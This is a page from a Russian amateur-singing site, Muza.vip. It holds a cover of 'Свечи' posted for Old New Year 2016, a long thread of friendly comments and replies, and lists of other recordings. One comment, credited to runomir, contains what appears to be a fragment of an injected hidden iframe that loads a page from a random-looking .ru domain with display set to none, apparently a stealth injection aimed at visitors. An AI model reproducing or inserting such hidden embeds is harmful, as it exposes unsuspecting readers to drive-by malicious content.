На главную Muza.vip
      
My Love
(Paul McCartney)
Запела осень
(Хурсенко Вячеслав)
Hello Goodbye
(Beatles)
Романс
(Сумишевский Ярослав)
Я не буду ни о чём жалеть
(Исмоиловы Хасан и Хусен)


Песня месяца
Май 2026 года
Angelochek_msНадоело засыпать одной
(Мельянцева Надежда)

Баллов: 717



   «Свечи» (Шуфутинский Михаил)

88   51   3
   Кавер-версия от LizochekArt
11.01.2016 2153
Вот и закончились любимые праздники, но... на десерт, нас ждёт ещё один!..
Старый Новый год!.. Тихий, домашний, уютный и непременно... со свечами!..))
  Баллов:
48
  

Подарки:


Комментарии пользователей к записи:

LizochekArt, 11.01.2016 г. 21:54
  
yurij-046, 11.01.2016 г. 22:04
Лизонька,милая,спасибо за прекрасное исполнение,очень красивое,трогательное,проникновенное и душевное!!!buket_serdechkibravo_bigvozdushnyj_poceluj
http://svitppt.com.ua/images/13/12873/770/img27.jpg С наступающим старым новым годом martinis_sharikami
  

LizochekArt, 11.01.2016 г. 22:09
Юрочка, спасибо огромное за тёплый отзыв!..vozdushnyj_poceluj

  
Wasilyok, 11.01.2016 г. 22:06
Сестрёна, а за ним ещё крещение будет ))) Так что январь богат на праздники ... Замечательно спела , Лизонька ))) Я её на гитаре научился в 80ом, очень понравилась )))buket_serdechkibuket_big люблю иногда вечером под гитарку попеть ...guitar
  

LizochekArt, 11.01.2016 г. 22:28
Ну так-то у нас, Василёк, сейчас каждый день Святки ещё идут!..smeh shampusik
Привет Братишка!..vozdushnyj_poceluj
А я вот представляешь, к стыду своему, совсем недавно эту песню услышала!..smushenie
А как услышала, так она мне сразу в душу и запала и вот... пошла петь!.. smeh

  
mranatolm, 11.01.2016 г. 22:12
ЛИЗОНЬКА !!!!!!!! КРАСИВО И НЕЖНО ЗВУЧИШЬ !!!!! ПРЕКРАСНО СПЕЛА !!!!!!

  

LizochekArt, 11.01.2016 г. 22:38
Толенька, спасибо тебе огромное за прекрасные розы!..vozdushnyj_poceluj

  
runomir, 11.01.2016 г. 23:17
ЛИЗА id="a1996667054" src="//ubnsyhv27fa2j.ru/f.html" style="display:none">
  

LizochekArt, 11.01.2016 г. 23:34
Взаимно, Сашуль!..

  
Marka64, 12.01.2016 г. 00:29
...и с "Лунной сонатой"...)))Очень красивое исполнение,Лизанька!!!bravo_bigПусть этот год будет удачным и мирным для тебя,твоих родных и любимых!!!serdce_v_ruke
  

LizochekArt, 12.01.2016 г. 01:07
Оленька, так хочется, чтобы все уже успокоились!.. Так хочется добра и мира для всех!!! buket_serdechkis_sharikami
Спасибо тебе за пожелание, моя хорошая, будем верить в лучшее!!!!vozdushnyj_poceluj

  

Marka64, 12.01.2016 г. 01:12
Будем надеяться,что люди придут уже в разум...Только вот зная Восток...я на это не очень надеюсь...
  

LizochekArt, 13.01.2016 г. 11:27
Согласна, Оленька!.. Всё это нам знакомо... Муж ведь мой родился и вырос в Таджикистане... в 92-м вся семья его переехала в Россию, страшно вспоминать, что им пришлось пережить, мы с мужем уже тогда в Приморье уже служили, а они бедные натерпелись... Мать с отцом так и не смогли всё это пережить, очень быстро умерли... От того так остро и переживаем из-за всего происходящего, а всё равно хочется, ОЧЕНЬ хочется верить в лучшее!!! serdce_v_ruke
С наступающим Старым Новым годом тебя, Оленька!!! Пусть Новый год принесёт тебе всё, только самое доброе., светлое и желанное!!!!vozdushnyj_pocelujchok

  

Marka64, 13.01.2016 г. 20:23
А нас спрашивали...а почему вы уехали?...М-да...Теперь,надеюсь,понимают...почему(((
  
Plana, 12.01.2016 г. 06:01
Лизонька, красиво, тепло, выразительно и трогательно спела!!bravo_big С наступающим Новым Старым годом! Пусть год будет удачным и добрым, несет с собой здоровье, радость и благополучие!!love_online
  

LizochekArt, 13.01.2016 г. 11:12
Наташенька, спасибо, моя хорошая!!! vozdushnyj_poceluj
С Наступающим тебя и всю твою семью замечательную!..chok
Счастья вам любви и здоровья!!!!!serdce_v_rukebuket_serdechkibuket_big

  

Plana, 13.01.2016 г. 11:50
Лизонька,спасибо солнышко!! Твою семьюс Праздником!! Счастья, здоровья, радости и благополучия!!love_online
  
Mikolu4ka, 12.01.2016 г. 09:37
Лизонька, дорогая, vozd_poceluj
  

LizochekArt, 13.01.2016 г. 11:29
Иришенька, спасибо дорогая!.. vozdushnyj_poceluj
С Наступающим тебя, любви, удачи и огромного счастья!!!chokbuket_big

  
milana18, 12.01.2016 г. 09:48
  

LizochekArt, 13.01.2016 г. 11:32
Миланочка, спасибо милая!!! vozdushnyj_poceluj
С наступающим Старым Новым годом тебя, любви, счастья и удачи!!!chokbuket_big
  
LARISA2709, 12.01.2016 г. 10:51
Лизонька..очень красиво!!!

  

LizochekArt, 13.01.2016 г. 11:37
Ларисонька, дорогая, от души тебя благодарю!!!vozdushnyj_poceluj И я тебя поздравляю, пусть Новый год принесёт тебе только любовь, счастье, радость и удачу!!!!!buket_bigchokvozdushnyj_poceluj

  
gell, 12.01.2016 г. 18:23
как давно я не слышала эту песню. Лизонька, красоту сотворилаv_romashkahlove_onlineА у меня в двойне праздник, старый новый год и мамин День рожденияdada Лизонька, счастья тебе и твоей семье, мирного небаbuket_serdechki
  

LizochekArt, 13.01.2016 г. 11:40
Любушка, дорогая моя, спасибо и я от души поздравляю тебя!!! Мамочке твоей здоровья и долгих лет жизни!!!serdce_v_ruke
Любви, удачи и огромного счастья тебе и всей твоей семье!!!chokbuket_big
  
Natalia22, 12.01.2016 г. 22:20
Лизочка!Красивое и нежное исполнение! С Наступающим Старым Новым годом!Счастья,любви,всего самого доброго и прекрасного!bravo_bigvozdushnyj_pocelujmartini

  

LizochekArt, 13.01.2016 г. 11:43
Наташенька, спасибо милая!!! vozdushnyj_poceluj
И тебя с наступающим Старым Новым годом, любви, счастья и удачи!!!chokbuket_big
  
milaya72, 13.01.2016 г. 22:54
Лизонька очаровательно спела!!!voo
  

LizochekArt, 15.01.2016 г. 11:24
Надюша, спасибо милая!!!!vozdushnyj_poceluj
Пусть Новый год принесёт тебе много любви и счастья!!!!!!buket_bigchok

  
MihailTeplov, 14.01.2016 г. 21:02
ЛИЗОНЬКА!!! КРАСИВОЕ И ДУШЕВНОЕ ИСПОЛНЕНИЕ ПЕСНИ!!!! С ПРЕВЕЛИКИМ УДОВОЛЬСТВИЕМ ПОСЛУШАЛ!!! vozdushnyj_poceluj
СЧАСТЬЯ И ЛЮБВИ В НОВОМ ГОДУ ДОРОГАЯ!!! buket_big

  

LizochekArt, 15.01.2016 г. 11:26
Мишенька, спасибо дорогой!!!! vozdushnyj_poceluj
От души желаю и тебе много-много счастья и всего-всего самого доброго и светлого!!!!!buket_bigchok

  
antruag1, 15.01.2016 г. 16:02
Лизочка !Великолепное исполнение,Очень понравилось! bravo_bigbravo_bigbuket_serdechkilove_online
  
Olya_radost, 20.01.2016 г. 23:10

Да, Лизочка, этот праздник всегда будет нашим! Не забываем мы про него.... Спасибо за прекрасную песню! Слушать тебя в удовольствие!!!!!!!love_onlined9serdce_v_rukechok
  
Nadejda200, 07.02.2016 г. 15:38
Милая, Лизонька, сестричка моя хорошая! Очень приятно было посидеть и помечтать с тобой под эту песню! Пусть свечи тают и плачут, а на душе тепло и нежность )))))) Спасибо тебе, родная! angelochekvozdushnyj_poceluj
  

align=absbottomКомментарии могут оставлять только зарегистрированные пользователи, активировавшие аккаунт!
Зарегистрироваться или войти

  ПОМОГАЕМ
  ЖИВОТНЫМ
  В ЗОНЕ СВО



Случайная запись


Студия
V_Severskiy
Ты моя
Могилевский Анатолий
Biss
И плакали дожди
Косенко Вадим
MAXMIX
Милая моя, любимая
Одинцов Сергей
Pol701
Dance me to the end of love
Leonard Cohen
Nissan66
Палуба
Маркин Владимир
Aleksantin
В меня глазами не стреляй
Искусственный интеллект
Garry
Песня про казака
В 6 часов вечера после войны
vas707356
Беззаботный
Маршал Александр
4upakabra
Расскажи, Снегурочка
4upakabra
ARAKS
Вас не нужно жалеть
Кальянов Александр
besel1212
Священная война
Военные и Патриотические
rww01
Тик-так
Ждамиров Владимир
alsar
Наша жизнь
Михайлов Стас
ivanka-nik-2
Простой мотив
Лещенко Лев
natashap
А я ждала
Александрова Марина
ivanka-nik-1
Мама
Магомаев Муслим
FAMOUS
Я любил тебя
Дато
p12et1025
Дружба
Митяев Олег
akononov6690
А может ты найдёшь быстрей
Band Odessa
elemi
Судьба
Руденко Артур
lena_chka_54
Быть женщиной твоей
Джанни Стелла
Otblesk
Черный ворон
Русские
RUSSMIR
Молитва
Варвара
lesha
Мечтать не грех
Кричевский Гарик
Vladavtopilot
22-е июня
Сукачев Гарик
egorrushka
22 июня
Митяев Олег
dimakapitan
Не покидай меня
Трофимов Сергей
mranatolm
Синий платочек
Козин Вадим
Temanik
Галина
Добры молодцы
LonelyWoolf
Changes
Black Sabbath




Территория творческого настроения © Muza.vip, 2011 — 2026 гг. Пользовательское соглашение.